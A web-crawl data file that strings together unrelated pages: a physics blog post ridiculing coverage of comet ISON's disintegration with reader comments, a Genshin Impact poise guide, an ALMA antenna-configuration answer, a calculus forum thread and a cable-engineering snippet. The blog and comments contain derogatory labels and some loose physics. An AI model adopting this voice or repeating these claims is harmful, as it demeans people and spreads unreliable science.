"s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514572896.15/warc/CC-MAIN-20190924083200-20190924105200-00526.warc.gz"} |
http://motls.blogspot.com/2013/12/science-writers-weird-obsession-with.html | ## Sunday, December 01, 2013 ... /////
### Science writers' weird obsession with the resurrection of ISON
The comet has been doomed at least since the first moment when it looked so; claims to the contrary were always just some irrational religion
The good folks who were excited about the alleged resurrection of Jesus Christ were not too unreasonable. To say the least, they were not more unreasonable than most science writers who were producing stories about comet ISON's "survival" in recent days.
When I wrote the satire about the comet's destruction by global warming (yes, there were some readers who didn't understand it was a satire!), I took one claim for granted: the comet couldn't have survived, at least not to the extent needed for the comet to be visible by the naked eye e.g. today and the visibility of ISON's remains would be guaranteed to decrease quickly.
(The debris had magnitude plus 7 late yesterday which already made it invisible. NASA's JPL predicted a year ago that the brightness of the comet could be around minus 11.6 by now, brighter than the full Moon. That prediction has failed rather spectacularly, hasn't it?)
But you must have seen reports by pretty much everyone – Fox News, The Guardian, Matt Strassler, and thousands of others – who were completely excited with their thoroughly unjustified claims that the "comet has survived", "we have a hope", and so on – the similarity of ISON with Son of God is almost perfect.
Let's restore just some common sense and elementary physics.
On November 28th, the comet approached the perihelium, the closest point to the Sun on its trajectory. Its distance from the Sun was just a little bit larger than 0.01 AU – AU is the distance between the Earth and the Sun. It was almost 100 times shorter than the Earth-Sun distance. Perhaps 0.015 AU, I forgot the exact number.
Fine. The amount of "watts per squared meter" that you're getting from the Sun depends on the distance as $1/R^2$ – the photons just get spread over the sphere of radius $4\pi R^2$, if you wish. So the number of "watts per squared meter" is approximately $10,000$ times greater at the point of the comet's perihelion than it is here on Earth.
However, the equilibrium temperature is one at which the outgoing thermal radiation matches the incoming one. The outgoing thermal radiation goes like $T^4$ so the equilibrium absolute temperature $T$ "over there" is about $10$ times greater than it is on Earth because $10^4=10,000$. On Earth, it is something like 300 kelvins (the room temperature or so) which means that you expect the temperature on the comet as it approaches this perihelion to go to several thousand of degrees.
What can be burned near the surface will burn – and become darker in color (think of burned wood). All the ice and water will surely vaporize. At these high temperatures, the water beneath the surface of any "ice core" is moving somewhat frantically and the heat quickly gets deeper inside the comet. Any hole means that all the ice and liquid water vaporizes and gets away.
So what you see when the comet gets this close to the Sun is just some heated material that radiates but the material that has a chance to hold together is nearly black and the remaining material is mostly vaporized which means that the molecules are moving away from others.
Water, ice, and some thin atmosphere are important for the visibility of a comet. It is not hard to see that the atmosphere has no chance to survive the heat. Take the Halley comet whose numbers haven't become obsolete because of the comet's death. Its diameter is of order 10 kilometers. This chunk of mass has some gravitational field but it is tiny. It's more meaningful to talk about the escape velocity from the Halley comet. You know how much it is for similar masses? It is 2 meters per second. If a gas molecule moves faster than 2 meters per second, it will never return. Compare this escape velocity with 11,000 meters per second from the Earth, a large enough value so that NASA needs to use rockets to escape the Earth's gravitational pull.
The escape velocity of 2 meters per second is so tiny that slightly heated gas instantly escapes. To understand this point, realize that at the room temperature (the equilibrium temperature near the Earth, approximately), the average speed of an air molecule is around 500 m/s. Now, the kinetic energy is proportional to the temperature ($3kT/2$ etc.) so the speed is only proportional to the square root of the absolute temperature. I said that the absolute temperature may be around 10 times greater on the comet while near perihelion so the average speed of gas molecules over there will exceed 1,000 m/s. It's much greater than the escape velocity from the comet's very weak gravitational field.
So the cute coma is not really bound to the comet once it gets heated up. The gas molecules' speed is vastly higher than the required escape speed and the gas will just tell the comet good-bye, forever.
One could discuss some solid materials that have a chance not to vaporize. Some pure metals could arguably melt and refreeze later. If that happened, the comet could become a mirror which doesn't really reflect much light to generic directions. I won't probably happen, anyway. More likely, one may get some solid leftover material that is dark – and therefore absorbs lots of radiation, with the risk of evaporating earlier. And even if this dark material doesn't evaporate, it won't be visible.
Birth of Jesus Christ, Israel, 2017 years ago
There are obvious reasons why the "nearly compact" heated up material is visible when it is so close to the Sun: it is strongly illuminated by the nearby Sun and it is also producing its own heat and thermal radiation. However, at these high temperatures, there is no good reason to think that a light-colored non-gaseous material will survive anywhere near the comet's surface. Even if the comet (comet ISON's diameter is about 5 kilometers) were large enough to preserve a big chunk of ice etc., it will be hidden "inside" the dark material. The side that is close enough to the Sun – and it's the only side we can see by the naked eyes when the comet cools down again – has been darkened and/or vaporized.
That's the "complicated reason" why I found the hype about the resurrection and befuddled experts to be simply stupid. Sorry, Matt, your excitement lacked common sense and the comments that "experts are befuddled as well" is a lame excuse.
But there's one "simpler reason" why I found the reports really stupid. Comet ISON has already been seen to have largely disappeared. Well, this is like the process of dying and this process is, as you may have heard, pretty much irreversible. If the "health" of the comet looks somewhat better than an hour ago, it may be just a coincidence (a more reflective side of the debris was just rotated in the right direction or whatever). But to expect the comet to reappear in its original strength is exactly as naive as to expect a human being or Jesus Christ to be resurrected – apologies to the Christians who may think it is not naive. It violates the second law of thermodynamics and such violations are statistically allowed but only if they're "small".
Note that some comets in the empty space have no problems with the escape velocity etc. The temperature of outer space (its cosmic microwave background) is around 2 kelvins which is 100+ times lower than the room temperature (on Earth). That makes the thermal speed about 10 times smaller, comparable to dozens of meters per second, and some heavy comets may be able to beat it. (And the Halley comet distance at the perihelion is 0.6 AU, so the conditions on the comet are never too different from those on the Earth.)
You might also ask why it is that exactly "now", comet ISON died. Such comets exist for billions of years so why now? Well, there probably used to be many more comets at the beginning. Their number is dying away.
For exactly elliptical orbits, it would be very unlikely or impossible for the comet to approach very close to the Sun if it didn't do during its previous perihelion (the elliptical orbits are periodic). But I guess that there is some friction that reduces the velocity of the comet. For the "radial" direction, this doesn't matter much because the radial velocity is increased by the Sun's gravity again. However, no one is "restoring" the transverse, angular components of the velocity, which is why the comets' impact parameter is probably continuously increasing (along with the eccentricity); their speed is getting directed in the radial direction, making it increasingly likely that they will hit the Sun ("be sucked by the Sun") or its vicinity.
You may be sad but please forget about resurrection: Whatever material is left out of comet ISON will never look like a sexy hairy shining babe again, especially not to your naked eyes. The comet was visible shortly after it was doomed because it was heated by the nearby Sun and it was strongly illuminated by the nearby Sun. But already now, the distance of the comet from the Sun has increased 10 times relatively to the perihelion and as the distance continues to increase, the illumination by the Sun will go down much like the comet's temperature and the chance to see it with naked eyes will plummet to zero (from the already hopeless current values).
(BTW I was also close to writing something stupid about the comet. On Tuesday afternoon, before 5 pm or so, I saw Sirius which seemed brighter than I remembered it. Before I got home, I was convinced it had to be ISON. I even wrote two quick e-mails and 6 lines of a prepared blog post about the happy experience. But then I quickly got back to my senses, realizing that the location, timing, and shape were all wrong, and I wouldn't be trying to hide for a second that I was being stupid for half an hour. But some people are being stupid for days if not years or decades and they're trying to hide their stupidity in elaborate ways which is bad.)
#### snail feedback (38) :
I wished for, and therefore I got, a Like button! :-)
Two things about ISON spring to mind.
Water. When is it visible? Clearly you can see ice. However you can't see steam, its transparent. Once condensed, you can see it again. Is the lack of a tail a result of the water being steam, and not condensing out into a mist?
Secondly, I hear lots about the comet being a means of determining the state of the primordial solar system. However, its on a hyperbolic trajectory. What evidence is there that it comes from our solar system, and isn't a visitor from another solar system? It's odd that its a sun grazer. If it was in orbit around the sun, to come into the inner solar system then it can't have had much angular momentum. It would need a large mass to divert it into the centre. Seems odd to me.
in your finite human mind,resurection is not possible.But with God who is the creator of your finite mind and everything in the univr
erse,anything is possible.Jesus lives because he is God in the flesh,he created men from the dust of the Earth.He surely can resurrect a dead body.He SPOKE everything into xistance,Praise Jesus !!!!!!!
Creation and annihilation operators and path integrals go beautifully hand on hand together and not just as alternative options, see Faddeev&Slanov book on gauge fields and Xiao-Gang Wen book on Quantum field theory of many body systems
Mr Motl I agree with you that energy conservation is not valid all around the known universe, but as you say that since energy conservation is simply invalid and then any physical process can generate energy then why are perpetual motion machines mocked on ?
Nice article I agree with :-)
I think being able to reproduce the (relevant) results one wants to generalize, apply to new systems or situations, etc is a necessary prerequisite to ensure that one knows what one is doing in new research. Feynman is exactly right !
And it is not true that good theoretical physicists, who are very strong in formal work for example, have a deficite concerning language issues. On the contrary, I have observed that they have the most clear way of thinking and writing when explaining or presenting stuff, use technical terms and definitions consitstently (conversely to the situation in softer sciences), and avoid unnecessary babbling and creating impenetrable fogs (what people who dont know what they are talking about often do, compere for example high- and low-level questions on Physics SE...), but often have an immensely cool nice sense of humor that makes one rolling on the floor ;-)
When being interested in applications of renormalization group ideas to turbulence, I immediately liked the ERG (or functional renormalization group) appoach, which seems to be much more general, much better that the method introduced by Orszag et al. which relies on many approximations, does not allow for operators or interactions to become (ir)relevant in the course of the RG flow, etc ... :-P.
And it is slightly regrattable, that Zweibach said right at the beginning that he will use no path integrals in his book ...
Cheers
Lenny Susskind often mentioned (in his own funny way) in his video lectures, that he hates learning things by heart but prefers being able to derived it because he understands it ...
This is exactly my point of view too (even thought I am by no means able to derive everything I'd liked to be able to of course ...) ;-P
Hello Dr. Lubos Motl,
This is Kavan writing you. I am a student at the univ of Virginia.
I had the pleasure to read your answers on physics forums about the concept of a photon interfering with itself. Very good.I know this space is for comments on ISON but I could not find your email to contact you.I would like to ask you some very basic questions on the topic. Let me know if you have some time and i will email you my queries. Best regards,
Kavan
Dear Rijul, it is mocked because in the Earth-like conditions, the spacetime is nearly flat and the energy conservation holds almost accurately.
Almost equivalently, the time needed to change the energy by 100 percent or so due to the cosmological nonconservation is of order 10 bilion light years so it is not a fast enough or practical way to produce energy for free.
ISON perihelion was ~250 miles/sec. If the sun were cold monoatomic hydrogen, that most probable relative velocity gives a temp around 8 million K. Warm. However, the comet is belching insulating vapor re the Ledenfrost effect. It also has a blunt leading shock wave reflecting much of the nastiness, re space capsule heat shields. Complicated,
Important are its Roche radius and compression strength re the leading shock. We know ISON has lots of carbon for its Swan line green coma, radiating acetylene and cyanide radicals. ISON will do what ISON does based upon its unknown chemical and physical material properties.
Grant funding by managers requires scientists to be streetwalkers showing thigh all the way up, and promising so much more with zero risk and large DCF/ROI, all of it locked into a PERT chart. The best funding strategy is for a department to, by lottery, assign asinine extreme predictions to its faculty for publicity. Somebody is sure to hit, get funded, then intramurally share the wealth.
Dear Uncle Al, it is physically meaningless to compare the speed of celestial bodies with the thermal speed of gas molecules. The thermal motion has random directions and signs so one may always distinguish it from the collective motion of whole celestial bodies and these two types of contributions to a molecule's motion never mix.
Dear Giotis, Feynman still discovered many theories like the microscopic theory of superfluidity (of helium); Feynman-Gell-Mann theory of the weak force.
Things like partons and path integrals are also a "theory", kind of, and Quantum Electrodynamics whose co-father he is is surely a theory.
Dear Lubos, This may be off-topic but please can you say to us something about Frank Znidarsic's theory which uses a classical framework only. Thank you so much.
There are billions of icy objects in the Kuiper Belt, which lies beyond Neptune and out to about 50 AU. Some are very large, such as the planetismal, Pluto, and some are very small. They are relics of the formation of the solar system and, therefore, represent the original makeup of the material that condensed to form that system.
Complex gravitational interactions cause some of them to be ejected into interstellar space and a very few are directed toward the sun. We call these comets.
I'm quite aware of the mechanism. However, even in the Oort cloud they are in an orbit. To get them to become a sun grazer needs them to make a 90 degree turn. and effectively go into free fall. That's strikes me as very unlikely. Particularly for ISON which is on a once only trip in. Hyperbolic orbit.
They started advertising the special presentation, Super Comet ISON 2013, [Saturday, Dec. 7 at 10 p.m. ET/PT on Science Channel] during Thanksgiving.
Filled to the brim with hope for comet resurrection, with descrete commercial interruption. I'll be expecting Chevron to remind us all that they really dig windmill power, which is in no way to be construed to mean that they are chrony capitalist suck ups to the regulation state.
Inconvenient comets may evaporate, but overhyped TV events are eternal.
Molten dark metal residue would result in Widmanstätten pattern meteorites, I think.
The NYTimes suddenly finds religion they can believe in.
I agree with most of your blog post, but it is a stretch to say that one shouldn't care about other methods if one's own method works. Obviously there are potential upsides to becoming comfortable with another method, not just familiar, because perhaps it isn't clear at first that it is inferior or superior to your own way.
I'm sure this is what you meant, but it wasn't clear from your text.
We could all go to Stonehenge for the solstice — hold hands, light candles, smoke pot, sing Imagine and shag on the grass under a full moon. Maybe that will save it.
Hey, what about a Comet In Need concert? I'm sure all our new-age pop druids and assorted leftard showbiz Gaia botherers would turn up for free.
Cosmic ecodruids for celestial harmony! Right on, man, yeah!
Are we mad? How can we stand by and let this happen? Have we no feelings? The planet badly needs a sustainable comet policy and we're doing nothing, nothing I tell you.
The UN needs to act now!
Save the comets or the world will end next week!
Thursday, I think. But it might stretch to Saturday lunchtime.
Just after the apéritif hopefully ;-)
According to Russia's ultra-reliable ;) ITAR-TASS news agency, fragments of comet ISON could hit the earth between Christmas and the New Year.
If so, it won't be a planet buster. But a fist-sized chunk of rock and ice could ruin someone's day. Who should it hit:
a) Mullah Omar
b) Myley Cyrus
c) Al Gore
d) My annoying neighbor
This is somewhat off topic, but still of great concern of course. :)
HEALTH WARNING: I'm not a physicist so this might the a dumb question.
I know the standard calculation for getting the Earth's steady-state average temperature, (with tweaking for its albedo) from the Sun's output using Stefan's law and the need to invoke the greenhouse-gas' mechanism to explain the temperature difference. It hinges on taking the insolation on a disc the same diameter as the earth and then simply averaging that over the whole surface of the Earth (four times larger).
I wondered if that averaging were a little too simplistic. What I'm think is that if the difference between average day- and night-time temperatures were (I'm guessing for argument's sake) 20K then the rate of emission from the Earth would vary by a factor on the order of ~(1+20/300)^4-1, i.e. about 30% between day and night. Which means, in round terms, losing heat at a 30% lower rate at night than during the day with possible(?) implications for the resulting calculated steady-state temperature.
Ignoring the GHG effect, albedo and any other complications for the moment, and taking the Earth as say a thin (pick a depth) copper* spherical shell painted matt black (i.e. a black body), then knowing its thermal conductivity and capacity at every point it should be a straightforward matter to do the integrations and whatnot to arrive at the temperature at time t (modulo 24 hours) for all points on the surface. It isn't obvious to me then whether the resulting average temperature over the Earth's whole surface (necessarily the same for all times t, assuming a steady state) would be the same as that given by the standard calculation. Maybe it should be and I'm about to have a doh! moment thrust upon me, but it isn't.
Does anyone know of such a calculation and its results? Or is there an 'obvious' way one can see this would give the same result as the regular calculation?
* It doesn't have to be copper. Anything will do as long as its properties are nicely behaved for model purposes. Water would be best I suppose as it covers 2/3rds of the surface (ignoring oceanic currents as a first approximation).
Prof. Hsu wouldn't have given his young student Feynman an A, that's for sure. Of course Hsu is totally hung up on the subject of "intelligence" as "g," the underlying correlate of various mental abilities. Feynman only cared about the pudding.
That's called specialization, not limitation.
He also learned to draw and studied ants and women!
Oppenheimer studied Sanskrit I suspect to impress others with how intelligent he was. It really was a waste of time.
Not only was Feynman not bitter. He is an example of a satisfied mind: https://www.youtube.com/watch?v=fxP9zIe0A9E
Right, and I find many of his drawings etc.highly nontrivial, see
In some sense, even Clifford Johnson who loves to be in the top 5% of the "drawing scientists" is just emulating Feynman.
I would like to see Steve's paintings of women - or the arts by other folks who love to pompously present themselves as versatile, cultural men. Most of their image is just empty and offensive postmodern smugness.
Right - but Feynman could and did similar things. He learned to speak Portuguese fairly well and, more esoterically, figured out how to decode Mayan hieroglyphics.
1.. Did you mean billions of years ? Light year is a unit of distance not time
2. What I meant to say is that if someone formulates a concept in which he happenes to find little output energy without input, can it be simply explained by saying that conservation of energy is not exactly correct and is more of an approximation, hence it is ok if some energy is being created in proposed process ?
1. Yes, it's billions of years - in the c=1 units, a year and a light year is the same thing and I implicitly use the units all the time. The same comment may be rephrased to space. The typical "size of the region" you need to change the energy by O(100 percent) is of order tens of billions light years, too.
2. No, you cannot ever violate the energy conservation law unless you are considering a situation in which the whole global shape of the Universe - its asymptotic behavior at infinite distance - is being transformed. So whatever happens near the Earth will always conserve the energy pretty much exactly, with the deviations' being undetectable. I have already explained that.
You just ignore the answer because you seem obsessed with the idea that the invalidity of the energy conservation law in general cosmology justifies perpetual motion machines on the Earth. It doesn't, not even an iota of a justification.
I have just one more question for now, why are you and most (not all) people so adamant that noone can violate the law of conservation of energy, many places I have read that law of conservation of energy is just a law that has not been violated untill now, it was also said that to satisfy the law classical energy had to be redefined to support mass energy conversion. So my question is why so much of certainty that the law cannot be broken (for earthly or other simple matters) when we can modify basically everything we know and classify them as quantum and classical, why is someone thought of as a fool if he says that, Yes ! it it possible, not impossible.
Dear Rijul, it is impossible, not possible, to violate the energy conservation law in this Universe in all situations in which the overall cosmological time-dependent curvature of the Universe may be neglected or plays no role.
The energy conservation law has been shown to be equivalent to the time-translational symmetry of the laws of physics. That's Noether's theorem. Both versions of the law/symmetry are natural and agree with every single observation, arbitrarily accurate one, that has ever been made and every single fundamental or effective law to describe Nature that has ever been extracted from the observations.
That's why people who think that they may violate the energy conservation law in ordinary conditions are imbeciles in the denial of reality, to put it very diplomatically.
Not the temperature of the *comet* from its speed, but the apparent kinetic temperature of an impinging gas molecule upon the comet. De Laval nozzle vacuum-expanded molecular beams have rotational temps hard by absolute zero. In the lab frame they are supersonic (though Mach 1 in vacuum is much lower than 340 m/s for an unremarkable local Mach 20 beam).
http://hyperphysics.phy-astr.gsu.edu/hbase/kinetic/kintem.html
Plain vanilla
http://pac.iupac.org/publications/pac/pdf/2003/pdf/7507x0975.pdf
Chocolate fudge
Dum di dum di dum di dum ....
No takers. OK. I gather it was a dumb question then.
Would any of you be kind enough to say why and briefly point out the kernel of the dumbness. If so—and if you actually do so—I'd be awfully grateful.
Dear John,the right calculation of the Earth's equilibrium temperature deals with average (or total) energy flows.
It's really simple to know what's the average solar energy coming to Earth from all directions, averaged over all places, daytime, and seasons.
You want this average inflow of energy to be "per unit of area of the Earth's surface". The area of a sphere is 4.pi.R^2. But the radiation is really hitting the "cross section" which is a disk of area pi.R^2. So you just divide 1340 watts per meter squared by 4 to see how much the Earth is absorbing in average. This does all the three averagings automatically and exactly.
Dear Luboš,
Thank you very much for taking the time to reply. I appreciate it, especially as this is kindergarten-level stuff for you.
"Of course, one may do a more accurate calculation including the profiles and albedos."
Actually, that's (kind of) what I meant. But I also wanted to eliminate complications like albedo as what I was driving at was what I thought was the rather simplistic approach specifically taken to this averaging itself in the standard calculation. And yes, I appreciate that it's the energy flows that are the central issue here (actually that's what I was specifically trying to get at) and that averaging temperatures is just a very crude approach (taken presumably mainly in order to summarise the situation in a single 'alarming' number for ecotard propaganda purposes).
In short, averaging temperatures is a pretty crap way of expressing the energy flows, but given that one is going to do it then one would still want that (almost meaningless) average to be calculated correctly. My question was focused on this latter aspect as I suspect it isn't.
If you don't mind I'd like to come back on this. I intend to take a really simple 'toy' model to illustrate what (I think) I perceive as the essence of the problem. However, since I haven't attempted any formulation or calculation yet I might find that, when I do, my instinct about this is just plain nuts and I'm having a dumbarse senior moment.
Right now though, I'm pushed for time. On top of that my wife has decided to get on my case so I'm at DEFCON 2! :) | 2017-05-22 17:23:30 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5500062704086304, "perplexity": 1079.2909401841512}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-22/segments/1495463605485.49/warc/CC-MAIN-20170522171016-20170522191016-00636.warc.gz"} |
https://library.keqingmains.com/combat-mechanics/poise | Poise
An explanation of the Poise system in Genshin and how stagger works.
If you come across any unknown terms, there is a section in the glossary dedicated to terms used for poise mechanics.
# How to Stagger an Enemy
1. 1.
Reduce Poise to 0, which will put the enemy into the vulnerable status.
2. 2.
Attack the enemy, staggering them.
Different stagger levels exist for the various force of attacks that trigger the stagger.
3. 3.
Vulnerable status ends, and the poise bar is reset.
# Poise
All units have a hidden poise bar which decreases when receiving attacks that deal poise damage. When the poise bar is depleted to 0, the unit becomes vulnerable. This can be found in each character's attack tables.
$Actual Poise Damage = Poise Damage * Vulnerability$
## Factors that affect Poise
### Different enemies/characters have different poise, vulnerability, and poise regeneration
A Fatui Cryogunner has more poise, vulnerability, and poise regeneration than a normal Hilichurl. A melee character has more poise, vulnerability, and poise regeneration than a ranged character.
### Some attacks or abilities can change vulnerability
The vulnerability when a Cryogunner is generating their shield is less than when the Cryogunner is spraying. "Increasing resistance to interruption" skills take effect via decreasing vulnerability. The same goes for shields.
### Different sources of interrupt resistance can stack
You can stack Poise and allow your characters to further avoid being staggered.
## Factors that affect Poise Damage
### Different attacks/skills have different poise damage.
Zhongli's elemental skill does more poise damage than his N1.
### Poise damage can change depending on the character's status.
The poise damage of Xiao's plunges increases after activating his burst.
### Large level differences can reduce poise damage.
A low-level Kaeya can't knock back a level 89 Cicin Mage with his E, but a level 50 Kaeya can.
# The Vulnerable Status
Vulnerable Status is a status that occurs when a unit's poise bar is 0. The next attack received by a vulnerable unit may stagger them depending on the level of the stagger.
If an attack has enough force, the attack can both set the target’s status to vulnerable and stagger the target in one go.
### Different enemies/characters have different vulnerable durations.
The duration of a Cryogunner's vulnerable status is less than a normal Hilichurl's. The duration of a melee character's vulnerable status is less than a ranged character's.
### When the vulnerable status ends, the poise bar is reset to its default value.
During the stagger animation, an enemy is still considered vulnerable. Meaning, you can attack an enemy in the stagger animation to override the previous Stagger Level.
C4 Bennett uses a fully-charged level 1 elemental skill, causing a Stonehide Lawachurl to be staggered at Stagger Level 4. Bennett then performs an additional attack, causing the Level 4 Stagger animation to turn into a Level 2 Stagger.
# Impulse Types
When a target is in the vulnerable status, the next attack received may stagger them depending on the level of the stagger.
Common Impulse Type
Stagger Level
Horizontal Force
Vertical Force
Default
Mute
0
0
Level 0
Mute
0
0
Level 1
Shake
0
0
Level 2
Light
200
0
Level 3
Heavy
200
0
Level 4
Heavy
800
0
Level 5
Air
480
600
Level 6
Air
655
800
Level 7
Air
0
800
Level 8
Air
795
900
Level 9
Air
1200
600
# Force
## Factors that affect Force
### For the object exerting the force:
• The strength and direction of the force is affected by the level of the character/enemy and the talent used.
A low-level Venti can’t throw normal hilichurls into the air with his Q. Bennett can use his fully-charged level 1 E to cause a Level 4 Stagger on Stonehide Lawachurls, while Venti can’t do this with his E.
### For the object on which the force is applied:
• Mass
After using Venti’s elemental skill, a hilichurl is thrown into the air and falls slowly, while an Anemoboxer falls quickly. After using Kaeya’s elemental skill, a hilichurl is knocked back a large distance, while a Cryogunner is only knocked back a small step.
• Drag Force
Chongyun’s N1 can stagger a Mitachurl at Level 4 in the center of Venti’s burst, but can’t when a Mitachurl is standing on the ground. This indicates that the ground exerts a drag force. Ningguang’s charged attack with 2 star jades can only cause a Level 2 Stagger on an Anemoboxer standing on the ground, but can cause a Level 3 Stagger on an Anemoboxer standing on the edge of a meteorite cast by Geo Traveler.
# Credits
Writer: Neptunya#8291 and [Neko]#3521 | 2022-08-09 12:49:04 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 1, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3884599506855011, "perplexity": 11029.211634205572}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882570977.50/warc/CC-MAIN-20220809124724-20220809154724-00563.warc.gz"} |
https://astronomy.stackexchange.com/questions/28659/how-often-do-they-move-most-all-of-almas-dishes | # How often do they move most/all of ALMA's dishes?
The Phys.org article Unknown treasure trove of planets found hiding in dust reports on recently published radio measurements (~1.3mm) of planetary systems forming around stars in Taurus:
Scientists base this scenario of how our solar system came to be on observations of protoplanetary disks around other stars that are young enough to currently be in the process of birthing planets. Using the Atacama Large Millimeter Array, or ALMA, comprising 45 radio antennas in Chile's Atacama Desert, the team performed a survey of young stars in the Taurus star-forming region, a vast cloud of gas and dust located a modest 450 light-years from Earth. When the researchers imaged 32 stars surrounded by protoplanetary disks, they found that 12 of them—40 percent—have rings and gaps, structures that according to the team's measurements and calculations can be best explained by the presence of nascent planets.
The article ends by saying:
Going forward, the research group plans to move ALMA's antennas farther apart, which should increase the array's resolution to around five astronomical units (one AU equals the average distance between the Earth and the sun), and to make the antennas sensitive to other frequencies that are sensitive to other types of dust.
"Our results are an exciting step in understanding this key phase of planet formation," Long said, "and by making these adjustments, we are hoping to better understand the origins of the rings and gaps."
Changing from 15AU to 5 AU suggests a roughly factor of 3 increase in the overall scale of the pattern of antennas. The linked paper in ApJ Feng Long et al. has a preprint in ArXiv as well, which says:
All observations were obtained from late August to early September 2017 using 45-47 12-m antennas on baselines of 21∼3697 m (15∼2780 kλ), with slight differences in each group (see Table 1).
Several years ago I remember reading about the design of ALMA and there are a lot more places to put dishes than there are dishes. I think there were five optimized configurations that all looked to have a similar spiral shape, but each one was maybe a factor of 2 or 3 larger than the previous.
Since the dishes take time to move and setup and calibrate, this probably doesn't happen that often.
Question: How often does it happen? How often do they move most of ALMA's dishes to change resolution?
If there's a site that shows how ALMA is set up now, and what the next setup will be and when, that would be great to know about as well.
above: "Until recently, protoplanetary disks were believed to be smooth, like pancake-like objects. The results from this study show that some disks are more like doughnuts with holes, but even more often appear as a series of rings. The rings are likely carved by planets that are otherwise invisible to us." Source Credit: Feng Long/ALMA
The list of array configurations is given in the Proposers Guide and ten configurations have been defined for the 43 12-meter antennas. They have the form C43-x where x goes from 1 (most compact; 15-161 meter separation) to 10 (least compact; 244-16200 meter separation). The changes between configurations are shown in the Configuration Schedule; over the ~12 months of Cycle 6, it looks like they change configuration 14 times. There is a month long "Antennae Relocation Shutdown" in May 2019 as they transition from fairly compact to least compact - presumably because it takes a longer time to move the 43 dishes out multiple kilometers | 2021-01-24 03:23:37 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3007531464099884, "perplexity": 1815.146814153934}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703544403.51/warc/CC-MAIN-20210124013637-20210124043637-00534.warc.gz"} |
http://mathhelpforum.com/differential-equations/177224-inhibited-growth.html | # Math Help - inhibited growth
1. ## inhibited growth
There is a problem in my textbook that is exactly like one of the examples, but just uses different numbers.
Problem: A tank initially contains 400 gal of brine in which 100 lbs of salt are dissolved. Brine containing 1/10 lb of salt per gallon is run into the tank at 20 gal/min, the mixture being drained off at the same rate. How many lbs of salt remain in the tank after 30 minutes?
In the example, we separate variables and integrate. I use the same method to solve this problem, it just has different numbers and I get: 40-60e^(-t/20). The books's answer is 40 + 60e^(-t/20).
What am I doing wrong?
2. I got it.
When going through the problem you deal with the quantity ln(40-x). But 40-x would be negative at t=0, so we must be dealing with -(40-x)=(x-40)
3. Looks to me like you probably integrated
$\dfrac{1}{40-x}$ and got $\ln|40-x|,$ whereas you should have gotten $-\ln|40-x|.$ You have to do a $u$ substitution in order to use that rule! | 2015-10-07 04:41:16 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 4, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5811253786087036, "perplexity": 568.3438346117665}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-40/segments/1443736682102.57/warc/CC-MAIN-20151001215802-00244-ip-10-137-6-227.ec2.internal.warc.gz"} |
https://www.cableizer.com/documentation/R_CG/ | Thermal resistance of multi-layer backfill
Overall thermal resistance between buried cables in a multi-layer backfill and the ground surface.
